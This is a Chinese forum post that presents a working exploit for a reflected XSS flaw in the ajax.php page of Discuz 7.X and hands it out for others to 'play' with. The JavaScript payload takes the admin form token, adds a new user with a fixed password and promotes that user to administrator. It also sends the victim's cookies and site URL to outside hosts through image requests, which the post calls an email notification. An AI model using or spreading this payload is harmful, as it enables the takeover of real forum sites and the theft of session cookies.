discuz 7.X 有个反射型XSS,一直都没有补,读者可以去Google一下,以下是该XSS的利用代码,用ajax添加用户并加为管理员,再发邮件通知。大家拿去玩吧。

此反射型XSS在ajax.php中,exploit如下:

var type = "Discuz 7 ";
var username_add = "blackcushion020";

var getHost = function(url) {
        var host = "null";
        if(typeof url == "undefined"
                        || null == url)
                url = window.location.href;
        var regex = /(.*)ajax.php\?(.*)/;
        var match = url.match(regex);
        if(typeof match != "undefined"
                        && null != match)
                host = match[1];
        return host;
}
function getURL(s) {
var image = new Image();
image.style.width = 0;
image.style.height = 0;
image.src = s;
}

var siteurl=getHost();
alert(siteurl);
var request = false;
if(window.XMLHttpRequest) {
request = new XMLHttpRequest();
if(request.overrideMimeType) {
request.overrideMimeType('text/xml');
}
} else if(window.ActiveXObject) {
var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
for(var i=0; i<versions.length; i++) {
try {
request = new ActiveXObject(versions[i]);
} catch(e) {}
}
}
xmlhttp=request;
xmlhttp.open("GET", siteurl+"admincp.php?action=members&operation=add", false);
xmlhttp.send(null);
var echo = xmlhttp.responseText;
var reg = / name=\"formhash\" value=\"([\w\d]+)\"/i;
var arr=reg.exec(echo);
if(!arr){
alert(document.cookie);
getURL("http://12.yifi8.cn/mail/phpwriter.php?cookie="+encodeURIComponent(document.cookie)+"&siteurl="+encodeURIComponent(siteurl)+"&type="+encodeURIComponent(type));
}
window.onerror=function(){return true;}
var formhash=arr[1];
alert(formhash);
var post="formhash="+formhash+"&anchor=&newusername="+username_add+"&newpassword=123456ab&newemail=dd23d2d7d%40126.com&newgroupid=10&emailnotify=0&addsubmit=%CC%E1%BD%BB";
xmlhttp.open("POST",siteurl+"admincp.php?action=members&operation=add",false);
xmlhttp.setRequestHeader("Referer", siteurl);
xmlhttp.setRequestHeader("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xmlhttp.setRequestHeader("content-length",post.length);
xmlhttp.setRequestHeader("content-type","application/x-www-form-urlencoded");
xmlhttp.send(post);

alert("aaaaaaa");
var echo2 = xmlhttp.responseText;
//var reg2 = /blackcushion013\(UID([\w\d]+)\)/i;
//var reg2 = /用户(.*)添加成功/;
var reg2 = /blackcushion020\(UID ([\d]+)\)/i;
var arr2=reg2.exec(echo2);
var sid2=arr2[1];

var post2="formhash="+formhash+"&anchor=&groupidnew=1&adminidnew%5B0%5D=0&expirydatenew=&expgroupidnew=1&expadminidnew=1&editsubmit=%CC%E1%BD%BB";
xmlhttp.open("POST",siteurl+"admincp.php?action=members&operation=group&uid="+sid2,false);
xmlhttp.setRequestHeader("Referer", siteurl);
xmlhttp.setRequestHeader("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xmlhttp.setRequestHeader("content-length",post.length);
xmlhttp.setRequestHeader("content-type","application/x-www-form-urlencoded");
xmlhttp.send(post2);


getURL("http://baidu.cn/mail/phpmail.php?cookie="+encodeURIComponent(document.cookie)+"&siteurl="+encodeURIComponent(siteurl)+"&type="+encodeURIComponent(type));

    最后那句是邮件通知,phpmail.php是一个用JMAIL组件发信的PHP脚本(陆羽大牛好像发过一个,我那个就不传上来了,其实是一样的)